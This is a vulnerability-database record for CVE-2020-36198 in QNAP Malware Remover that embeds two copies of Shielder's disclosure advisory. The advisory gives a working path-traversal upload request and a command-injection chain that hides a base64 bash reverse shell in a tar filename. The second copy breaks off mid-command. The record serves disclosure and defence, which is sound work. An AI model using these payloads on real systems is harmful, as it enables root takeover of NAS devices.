A command injection vulnerability has been reported to affect certain versions of Malware Remover. If exploited, this vulnerability allows remote attackers to execute arbitrary commands. This issue affects: QNAP Systems Inc. Malware Remover versions prior to 4.6.1.0. This issue does not affect: QNAP Systems Inc. Malware Remover 3.x.
{"id": "CVE-2020-36198", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-36198", "description": "A command injection vulnerability has been reported to affect certain versions of Malware Remover. If exploited, this vulnerability allows remote attackers to execute arbitrary commands. This issue affects: QNAP Systems Inc. Malware Remover versions prior to 4.6.1.0. This issue does not affect: QNAP Systems Inc. Malware Remover 3.x.", "published": "2021-05-13T03:15:00", "modified": "2022-04-26T16:04:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-36198", "reporter": "security@qnap.com", "references": ["https://www.qnap.com/zh-tw/security-advisory/qsa-21-16", "https://www.zerodayinitiative.com/advisories/ZDI-21-592/", "http://packetstormsecurity.com/files/162849/QNAP-MusicStation-MalwareRemover-File-Upload-Command-Injection.html"], "cvelist": ["CVE-2020-36198"], "immutableFields": [], "lastseen": "2022-04-26T20:09:28", "viewCount": 77, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:99262"]}, {"type": "zdi", "idList": ["ZDI-21-592"]}, {"type": "zdt", "idList": ["1337DAY-ID-36314"]}], "rev": 4}, "score": {"value": 7.8, "vector": "NONE"}, "twitter": {"counter": 5, "modified": "2021-05-29T08:51:03", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1392878573631983619", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (Malware Remover up to 4.6.0.x command injection [CVE-2020-36198]) has been published on https://t.co/OmF2uw5M7m?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1392878573631983619", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (Malware Remover up to 4.6.0.x command injection [CVE-2020-36198]) has been published on https://t.co/OmF2uw5M7m?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1392980598998904832", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-36198) has been published on https://t.co/B37RrG3FTy?amp=1"}, {"link": "https://twitter.com/RubertPereira/status/1395456495907745793", "text": "Ransomware /hashtag/QLocker?src=hashtag_click cierra despu\u00e9s de ganar 350,000$ en un 1 mes aprovechando vulnerabilidades dispositivos /hashtag/NAS?src=hashtag_click de /hashtag/QNAP?src=hashtag_click\n/BleepinComputer \n- QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution /hashtag/RCE?src=hashtag_click \nCVE-2020-36197 y CVE-2020-36198\nhttps://t.co/X66rh4brBG?amp=1 \u2026"}, {"link": "https://twitter.com/autumn_good_35/status/1399619234813005825", "text": "\u30de\u30eb\u30a6\u30a7\u30a2\u524a\u9664\u30c4\u30fc\u30eb\u306e\u8106\u5f31\u6027\n\nCVE-2020-36198\nCommand Injection Vulnerability in Malware Remover - Security Advisory | QNAP"}]}, "backreferences": {"references": [{"type": "seebug", "idList": ["SSV:99262"]}, {"type": "zdi", "idList": ["ZDI-21-592"]}, {"type": "zdt", "idList": ["1337DAY-ID-36314"]}]}, "exploitation": null, "vulnersScore": 7.8}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "QNAP Systems, Inc.", "cvss": {"3": {"vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "score": 6.7}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "qnap:malware_remover", "version": "4.6.1.0", "operator": "lt", "name": "qnap malware remover"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:qnap:malware_remover:4.6.1.0:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.4.0", "versionEndExcluding": "4.6.1.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.qnap.com/zh-tw/security-advisory/qsa-21-16", "name": "https://www.qnap.com/zh-tw/security-advisory/qsa-21-16", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-592/", "name": "https://www.zerodayinitiative.com/advisories/ZDI-21-592/", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "http://packetstormsecurity.com/files/162849/QNAP-MusicStation-MalwareRemover-File-Upload-Command-Injection.html", "name": "http://packetstormsecurity.com/files/162849/QNAP-MusicStation-MalwareRemover-File-Upload-Command-Injection.html", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory", "VDB Entry"]}]}
{"zdi": [{"lastseen": "2022-04-26T22:46:27", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of QNAP NAS. Authentication is required to exploit this vulnerability. The specific flaw exists within the Malware Remover application. A crafted TAR file in the file system can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the admin user.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T00:00:00", "type": "zdi", "title": "QNAP NAS Malware Remover Command Injection Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36198"], "modified": "2021-05-14T00:00:00", "id": "ZDI-21-592", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-592/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-04T15:54:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-28T00:00:00", "type": "zdt", "title": "QNAP MusicStation / MalwareRemover File Upload / Command Injection Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36198", "CVE-2020-36197"], "modified": "2021-05-28T00:00:00", "id": "1337DAY-ID-36314", "href": "https://0day.today/exploit/description/36314", "sourceData": "QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution\nSummary\n\nQNAP MusicStation and MalwareRemover official apps are affected by an arbitrary file upload and a command injection vulnerabilities, leading to pre-auth remote root command execution.\nProduct description (from vendor)\n\n\u201cQNAP (Quality Network Appliance Provider) is devoted to providing comprehensive solutions in software development, hardware design and in-house manufacturing.\u201d. For more information visit https://qnap.com/.\nCVE(s)\n\n CVE-2020-36197\n CVE-2020-36198\n\nDetails\nRoot cause analysis\nPre-auth arbitrary file write in MusicStation\n\n\u201cMusic Station is a web-based music player for users to enjoy their music collection on the NAS.\u201d from QNAP App Center.\n\nMusicStation is not pre-installed on the QNAP device, but it is one of the most popular apps in the QNAP ecosystem, counting more than 5 million installations in the QNAP App Center. The app allows the user to manage their music on the NAS device through a web browser.\n\nThe file musicstation/api/upload.php allows anyone to upload an album cover on the NAS Device:\n\n\n //upload temp album/artist art to NAS\n[1] $arttype = getHTTPValue('arttype','');//album,artist\n if(!empty($arttype)){\n $art_upload_temp = MS_CONFIG_FOLDER.\"arttemp/\";\n [...]\n $file = $_FILES['singleFile'];\n $fileInfo = pathinfo($file['name']);\t\n[2] if(strtolower($fileInfo['extension']) == \"jpg\" || strtolower($fileInfo['extension']) == \"jpeg\" || strtolower($fileInfo['extension']) == \"png\"){\n $tempfileid = uniqid($arttype.\"_\");\n[3] $temppath = $art_upload_temp.$tempfileid.\".\".strtolower($fileInfo['extension']);\n if(move_uploaded_file($file['tmp_name'],$temppath)){\n _Output($output,array(\"status\"=>1,\"fid\"=>encodeFilePath($tempfileid.\".\".strtolower($fileInfo['extension']))));\n\nAt [1] the HTTP parameter \u2018arttype\u2019 is loaded from the user HTTP request. At [2] the user-input filename extension (HTTP POST \u201csingleFile\u201d parameter\u2019s name) is verified to be one of an image file: \u201cjpeg\u201d, \u201cjpg\u201d or \u201cpng\u201d. At [3] the destination filename is assembled using the user-input arttype as a prefix (https://www.php.net/uniqid) and right after it is moved there. By providing a malicious arttype it is possible to write arbitrary files to a partially controlled location (specifically, the app will suffix the attacker\u2019s provided filename with _[a-f0-9]{13}\\.(jpg|jpeg|png)) in the QTS file system, since MusicStation (and all the other apps by default) runs with administrative privileges (root).\nProof-of-concept\n\nThe following HTTP request plants a file with filename prefix /tmp/polict:\n\n\nPOST /musicstation/api/upload.php?arttype=../../../../../../tmp/polict HTTP/1.1\nHost: qnap.local:8080\nContent-Type: multipart/form-data; boundary=---------------------------41226441225792835292630842014\nConnection: close\n\n-----------------------------41226441225792835292630842014\nContent-Disposition: form-data; name=\"singleFile\"; filename=\"a.jpg\"\nContent-Type: text/plain\n\nany content\n-----------------------------41226441225792835292630842014--\n\nThe final path is disclosed in the HTTP response in the fid field, e.g. Li4vLi4vLi4vLi4vLi4vLi4vdG1wL3BvbGljdF81ZWUyOGU5YTAyZTM5LmpwZw-3D-3D is ../../../../../../tmp/polict_5ee28e9a02e39.jpg, which is /tmp/polict_5ee28e9a02e39.jpg confirmed by a shell check:\n\n# cat /tmp/polict_5ee28e9a02e39.jpg\nany content\n\nCommand Injection in MalwareRemover\n\n\u201cThe Malware Remover is designed to protect your Turbo NAS against harmful software. QNAP strongly recommends that you install this app to avoid potential security risks.\u201d from QNAP App Center.\n\nMalwareRemover is a pre-installed and \u201cnon-removable\u201d app (\"- For device security reasons, you can no longer remove Malware Remover from App Center.\" from https://www.qnap.com/en/app_releasenotes/list.php?app_choose=MalwareRemover) running on the NAS device.\n\nBy default it runs a malware scan via cronjob everyday at 3 AM, however the time can be changed in the app\u2019s settings. sh /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/MalwareRemover.sh scan is the registered cronjob command to perform the scan. In turn it executes python /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/modules/centre.pyc --check, which will then execute sh /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/MalwareRemover_scan.sh. Such file will cycle and run all the anti-malware rules included in the app:\n\n [...]\n source ${QPKG_ROOT}/common.sh\n [...]\n[1] modules=$(get_modules)\n [...]\n for prog in $modules; do\n if [ ! -f ${STOPTYPE_PATH} ]; then\n echo $prog | grep -q '.pyc$'\n is_pyc=$?\n echo $prog | grep -q '.py$'\n is_py=$?\n if [ ${is_pyc} = 0 ] || [ ${is_py} = 0 ]; then\n prog_type=${PYTHON}\n else\n echo $prog | grep -q '.sh$'\n if [ $? = 0 ]; then\n prog_type=\"/bin/sh\"\n else\n[2] prog_type=\"/bin/sh -c\"\n fi\n fi\n LOG \"[$prog]\"\n cmd=\"${prog_type} $prog >> ${LOGFILE} 2>&1\"\n LOG \"cmd = $cmd\"\n[3] unit_status=`$cmd`\n [...]\n\nWhereas common.sh contains:\n\n\n [...]\n TMP_PATH=\"/tmp/.malware_remover\"\n #use this file to recognize which stop is\n STOPTYPE_PATH=${TMP_PATH}/stop_type\n [...]\n function get_modules()\n {\n[4] modules=`find $QPKG_ROOT/modules -regex \"$QPKG_ROOT/modules/[0-9][0-9]_[0-9a-zA-Z_]\\+\\(\\.[0-9a-zA-Z_\\-]\\+\\)\\?\" 2>/dev/null | busybox sort -r`\n echo ${modules}\n }\n [...]\n\nAt [1] the function get_modules is called, which at [4] lists the available files in a specific MalwareRemover folder ($QPKG_ROOT refers to the MalwareRemover QNAP Package folder location which by default is /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/ ) matching the [0-9][0-9]_[0-9a-zA-Z_]\\+\\(\\.[0-9a-zA-Z_\\-]\\+\\)\\? pattern (by the way, this stricter pattern broke the first \u201cfile write -> rce\u201d gadget identified), and its output is saved to the modules variable. At [2] if the current \u201cmodule\u201d filename doesn\u2019t match the pattern (\\.py|\\.pyc|\\.sh)$, /bin/sh -c is used as launcher program, which will interpret its following arguments as shell commands at [3]. The default MalwareRemover installation includes 19 modules, mostly in pyc format (decompilable using uncompyle6). modules/02_autoupgrade.pyc is vulnerable to a command injection and an arbitrary file write in an arbitrary file path (both vulnerabilities allow Remote Code Execution (RCE) as root (administrator)):\n\n\n [...]\n config_path = tostring([47, 116, 109, 112, 47, 99, 111, 110, 102, 105, 103, 47])\n [...]\n tmpconfig_status = check_tmp_config(config_path)\n [...]\n\nconfig_path is a bytearray containing \u201c/tmp/config\u201d, which will be used in check_tmp_config, defined in modules/autoupgrade.pyc:\n\n\n\n def check_tmp_config(config_path):\n [...]\n try:\n[1] mount_config()\n [...]\n\n match_files = []\n for key in akey:\n try:\n match_files += keyword_path(config_path, key, check_mount=True)\n [...]\n\n[2] for dirpath, dirnames, filenames in os.walk(config_path):\n for filename in filenames:\n filepath = '%s/%s' % (dirpath, filename)\n try:\n if tarfile.is_tarfile(filepath) is True and\n[3] is_tarball_match(filepath, ['@openssh']) is True:\n print('%s is malicious tarfile' % filepath)\n\nAt [1] mount_config is called, which will mount a temporary file system in /tmp/config (config_path). At [2] the content of the file system mounted in \u201c/tmp/config\u201d is listed (Note: between [1] and [2] any file created/moved in /tmp/config will be read at [2], indeed this race condition will be exploited) and checked if it contains a tar file and if is_tarball_match returns True. tarfile.is_tarfile doesn\u2019t require the path to have any particular file extension. is_tarball_match is defined in gadget.py:\n\n \n def is_tarball_match(filepath, rules):\n [...]\n tmp_dir = os.path.join(get_hdd_tmp_path(), '.remover_%s' % id_generator())\n LOG.debug('filepath = %s, tmp_dir = %s', filepath, tmp_dir)\n try:\n[1] tar = tarfile.open(filepath)\n [...]\n\n[2] tar.extractall(tmp_dir)\n [...]\n\n for dirpath, dirnames, filenames in os.walk(tmp_dir):\n for filename in filenames:\n filepath = '%s/%s' % (dirpath, filename)\n LOG.debug('check tarball file = %s', filepath)\n for rule in rules:\n try:\n result = None\n[3] string_cmd = 'strings %s | grep -E \"%s\"' % (filepath, rule)\n pobj = os.popen(string_cmd)\n\nAt [1] the tar file is parsed and at [2] all the file entries are extracted in a temporary folder. This is vulnerable to path traversal which enables to write/overwrite any file in the file system with an arbitrary file, like the documentation warns (Warning Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with \"/\" or filenames with two dots \"..\"), however there\u2019s a more immediate way than that to achieve Remote Code Execution. At [3] each filename included in the tar file is checked through an unsafe shell command execution. Via a malicious filename in the input tar file it is possible to achieve Remote Code Execution as root (administrator), e.g. using https://github.com/ptoomey3/evilarc and a bash TCP reverse shell payload:\n\n \n$ git clone https://github.com/ptoomey3/evilarc\nCloning into 'evilarc'...\nremote: Enumerating objects: 12, done.\nremote: Total 12 (delta 0), reused 0 (delta 0), pack-reused 12\nUnpacking objects: 100% (12/12), done.\n$ cd evilarc/\n$ echo -n 'bash -i >& /dev/tcp/172.16.42.114/8383 0>&1' | base64\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==\n$ touch ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'\n$ ./evilarc.py -f a.tar -o unix -d0 -p \"/tmp/polict\" ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'\nCreating a.tar containing /tmp/polict/;echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#\n\nThe next time MalwareRemover finds and scans the such file, it will spawn a TCP reverse shell as root.\nProof of concept\n\nThe full PoC code will be released at a later time.\nImpact\n\nBy chaining both issues it\u2019s possible to gain pre-auth Remote Code Execution with root privileges on a remote QNAP NAS.\nRemediation\n\nUpgrade QNAP MusicStation and MalwareRemover to the latest version available. (Note: we didn\u2019t verify the patches.)\nDisclosure timeline\n\n 28/09/2020: Submission to ZDI\u2019s portal\n 26/10/2020: While we were waiting for ZDI\u2019s submission feedback, QNAP fixed the \u201cfile write -> rce\u201d gadget vulnerability in MalwareRemover, breaking the full chain exploit\n 27/10/2020: polict finds an alternative gadget to achieve pre-auth remote root rce again and updates the report submitted to ZDI\n 14/05/2021: QNAP\u2019s and ZDI\u2019s advisories are made public:\n MusicStation:\n https://www.qnap.com/zh-tw/security-advisory/qsa-21-08\n https://www.zerodayinitiative.com/advisories/ZDI-21-591/\n MalwareRemover:\n https://www.qnap.com/zh-tw/security-advisory/qsa-21-16\n https://www.zerodayinitiative.com/advisories/ZDI-21-592/\n 19/05/2021: Shielder\u2019s advisory is made public\n\nCredits\n\n `polict` of Shielder\n\nThis advisory was first published on https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/\n", "sourceHref": "https://0day.today/exploit/36314", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-07-24T09:58:51", "description": "# QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution\n\n## Summary\n\nQNAP MusicStation and MalwareRemover official apps are affected by an arbitrary file upload and a command injection vulnerabilities, leading to pre-auth remote root command execution.\n\n## Product description (from vendor)\n\n\u201cQNAP (Quality Network Appliance Provider) is devoted to providing comprehensive solutions in software development, hardware design and in-house manufacturing.\u201d. For more information visit https://qnap.com/.\n\n## CVE(s)\n\n- [CVE-2020-36197](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36197)\n- [CVE-2020-36198](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36198)\n\n## Details\n\n### Root cause analysis\n\n#### Pre-auth arbitrary file write in MusicStation\n\n\u201cMusic Station is a web-based music player for users to enjoy their music collection on the NAS.\u201d from QNAP App Center.\n\nMusicStation is not pre-installed on the QNAP device, but it is one of the most popular apps in the QNAP ecosystem, counting more than 5 million installations in the QNAP App Center. The app allows the user to manage their music on the NAS device through a web browser.\n\nThe file `musicstation/api/upload.php` allows anyone to upload an album cover on the NAS Device:\n\n```\n //upload temp album/artist art to NAS\n[1] $arttype = getHTTPValue('arttype','');//album,artist\n if(!empty($arttype)){\n $art_upload_temp = MS_CONFIG_FOLDER.\"arttemp/\";\n [...]\n $file = $_FILES['singleFile'];\n $fileInfo = pathinfo($file['name']);\t\n[2] if(strtolower($fileInfo['extension']) == \"jpg\" || strtolower($fileInfo['extension']) == \"jpeg\" || strtolower($fileInfo['extension']) == \"png\"){\n $tempfileid = uniqid($arttype.\"_\");\n[3] $temppath = $art_upload_temp.$tempfileid.\".\".strtolower($fileInfo['extension']);\n if(move_uploaded_file($file['tmp_name'],$temppath)){\n _Output($output,array(\"status\"=>1,\"fid\"=>encodeFilePath($tempfileid.\".\".strtolower($fileInfo['extension']))));\n```\n\n\n\nAt [1] the HTTP parameter \u2018arttype\u2019 is loaded from the user HTTP request. At [2] the user-input filename extension (HTTP POST \u201csingleFile\u201d parameter\u2019s name) is verified to be one of an image file: \u201cjpeg\u201d, \u201cjpg\u201d or \u201cpng\u201d. At [3] the destination filename is assembled using the user-input `arttype` as a prefix (https://www.php.net/uniqid) and right after it is moved there. By providing a malicious `arttype` it is possible to write arbitrary files to a partially controlled location (specifically, the app will suffix the attacker\u2019s provided filename with `_[a-f0-9]{13}\\.(jpg|jpeg|png)`) in the QTS file system, since MusicStation (and all the other apps by default) runs with administrative privileges (root).\n\n##### Proof-of-concept\n\nThe following HTTP request plants a file with filename prefix `/tmp/polict`:\n\n```\nPOST /musicstation/api/upload.php?arttype=../../../../../../tmp/polict HTTP/1.1\nHost: qnap.local:8080\nContent-Type: multipart/form-data; boundary=---------------------------41226441225792835292630842014\nConnection: close\n\n-----------------------------41226441225792835292630842014\nContent-Disposition: form-data; name=\"singleFile\"; filename=\"a.jpg\"\nContent-Type: text/plain\n\nany content\n-----------------------------41226441225792835292630842014--\n```\n\n\n\nThe final path is disclosed in the HTTP response in the `fid` field, e.g. `Li4vLi4vLi4vLi4vLi4vLi4vdG1wL3BvbGljdF81ZWUyOGU5YTAyZTM5LmpwZw-3D-3D` is `../../../../../../tmp/polict_5ee28e9a02e39.jpg`, which is `/tmp/polict_5ee28e9a02e39.jpg` confirmed by a shell check:\n\n```shell=/bin/sh\n# cat /tmp/polict_5ee28e9a02e39.jpg\nany content\n```\n\n#### Command Injection in MalwareRemover\n\n\u201cThe Malware Remover is designed to protect your Turbo NAS against harmful software. QNAP strongly recommends that you install this app to avoid potential security risks.\u201d from QNAP App Center.\n\nMalwareRemover is a pre-installed and \u201cnon-removable\u201d app (\"- For device security reasons, you can no longer remove Malware Remover from App Center.\" from https://www.qnap.com/en/app_releasenotes/list.php?app_choose=MalwareRemover) running on the NAS device.\n\nBy default it runs a malware scan via cronjob everyday at 3 AM, however the time can be changed in the app\u2019s settings. `sh /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/MalwareRemover.sh scan` is the registered cronjob command to perform the scan. In turn it executes `python /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/modules/centre.pyc --check`, which will then execute `sh /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/MalwareRemover_scan.sh`. Such file will cycle and run all the anti-malware rules included in the app:\n\n```\n [...]\n source ${QPKG_ROOT}/common.sh\n [...]\n[1] modules=$(get_modules)\n [...]\n for prog in $modules; do\n if [ ! -f ${STOPTYPE_PATH} ]; then\n echo $prog | grep -q '.pyc$'\n is_pyc=$?\n echo $prog | grep -q '.py$'\n is_py=$?\n if [ ${is_pyc} = 0 ] || [ ${is_py} = 0 ]; then\n prog_type=${PYTHON}\n else\n echo $prog | grep -q '.sh$'\n if [ $? = 0 ]; then\n prog_type=\"/bin/sh\"\n else\n[2] prog_type=\"/bin/sh -c\"\n fi\n fi\n LOG \"[$prog]\"\n cmd=\"${prog_type} $prog >> ${LOGFILE} 2>&1\"\n LOG \"cmd = $cmd\"\n[3] unit_status=`$cmd`\n [...]\n```\n\n\n\nWhereas `common.sh` contains:\n\n```\n [...]\n TMP_PATH=\"/tmp/.malware_remover\"\n #use this file to recognize which stop is\n STOPTYPE_PATH=${TMP_PATH}/stop_type\n [...]\n function get_modules()\n {\n[4] modules=`find $QPKG_ROOT/modules -regex \"$QPKG_ROOT/modules/[0-9][0-9]_[0-9a-zA-Z_]\\+\\(\\.[0-9a-zA-Z_\\-]\\+\\)\\?\" 2>/dev/null | busybox sort -r`\n echo ${modules}\n }\n [...]\n```\n\n\n\nAt [1] the function `get_modules` is called, which at [4] lists the available files in a specific MalwareRemover folder (`$QPKG_ROOT` refers to the MalwareRemover QNAP Package folder location which by default is `/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/` ) matching the `[0-9][0-9]_[0-9a-zA-Z_]\\+\\(\\.[0-9a-zA-Z_\\-]\\+\\)\\?` pattern (by the way, this stricter pattern broke the first \u201cfile write -> rce\u201d gadget identified), and its output is saved to the `modules` variable. At [2] if the current \u201cmodule\u201d filename doesn\u2019t match the pattern `(\\.py|\\.pyc|\\.sh)$`, `/bin/sh -c` is used as launcher program, which will interpret its following arguments as shell commands at [3]. The default MalwareRemover installation includes 19 modules, mostly in `pyc` format (decompilable using [uncompyle6](https://pypi.org/project/uncompyle6/)). `modules/02_autoupgrade.pyc` is vulnerable to a command injection and an arbitrary file write in an arbitrary file path (both vulnerabilities allow Remote Code Execution (RCE) as root (administrator)):\n\n```\n [...]\n config_path = tostring([47, 116, 109, 112, 47, 99, 111, 110, 102, 105, 103, 47])\n [...]\n tmpconfig_status = check_tmp_config(config_path)\n [...]\n```\n\n\n\n`config_path` is a bytearray containing \u201c/tmp/config\u201d, which will be used in `check_tmp_config`, defined in `modules/autoupgrade.pyc`:\n\n```\n def check_tmp_config(config_path):\n [...]\n try:\n[1] mount_config()\n [...]\n\n match_files = []\n for key in akey:\n try:\n match_files += keyword_path(config_path, key, check_mount=True)\n [...]\n\n[2] for dirpath, dirnames, filenames in os.walk(config_path):\n for filename in filenames:\n filepath = '%s/%s' % (dirpath, filename)\n try:\n if tarfile.is_tarfile(filepath) is True and\n[3] is_tarball_match(filepath, ['@openssh']) is True:\n print('%s is malicious tarfile' % filepath)\n```\n\n\n\nAt [1] `mount_config` is called, which will mount a temporary file system in `/tmp/config` (`config_path`). At [2] the content of the file system mounted in \u201c/tmp/config\u201d is listed (Note: between [1] and [2] any file created/moved in `/tmp/config` will be read at [2], indeed this race condition will be exploited) and checked if it contains a tar file and if `is_tarball_match` returns True. `tarfile.is_tarfile` doesn\u2019t require the path to have any particular file extension. `is_tarball_match` is defined in `gadget.py`:\n\n```\n def is_tarball_match(filepath, rules):\n [...]\n tmp_dir = os.path.join(get_hdd_tmp_path(), '.remover_%s' % id_generator())\n LOG.debug('filepath = %s, tmp_dir = %s', filepath, tmp_dir)\n try:\n[1] tar = tarfile.open(filepath)\n [...]\n\n[2] tar.extractall(tmp_dir)\n [...]\n\n for dirpath, dirnames, filenames in os.walk(tmp_dir):\n for filename in filenames:\n filepath = '%s/%s' % (dirpath, filename)\n LOG.debug('check tarball file = %s', filepath)\n for rule in rules:\n try:\n result = None\n[3] string_cmd = 'strings %s | grep -E \"%s\"' % (filepath, rule)\n pobj = os.popen(string_cmd)\n```\n\n\n\nAt [1] the tar file is parsed and at [2] all the file entries are extracted in a temporary folder. This is vulnerable to path traversal which enables to write/overwrite any file in the file system with an arbitrary file, [like the documentation warns](https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall) (`Warning Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with \"/\" or filenames with two dots \"..\"`), however there\u2019s a more immediate way than that to achieve Remote Code Execution. At [3] each filename included in the tar file is checked through an unsafe shell command execution. Via a malicious filename in the input tar file it is possible to achieve Remote Code Execution as root (administrator), e.g. using https://github.com/ptoomey3/evilarc and a bash TCP reverse shell payload:\n\n```\n$ git clone https://github.com/ptoomey3/evilarc\nCloning into 'evilarc'...\nremote: Enumerating objects: 12, done.\nremote: Total 12 (delta 0), reused 0 (delta 0), pack-reused 12\nUnpacking objects: 100% (12/12), done.\n$ cd evilarc/\n$ echo -n 'bash -i >& /dev/tcp/172.16.42.114/8383 0>&1' | base64\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==\n$ touch ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'\n$ ./evilarc.py -f a.tar -o unix -d0 -p \"/tmp/polict\" ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'\nCreating a.tar containing 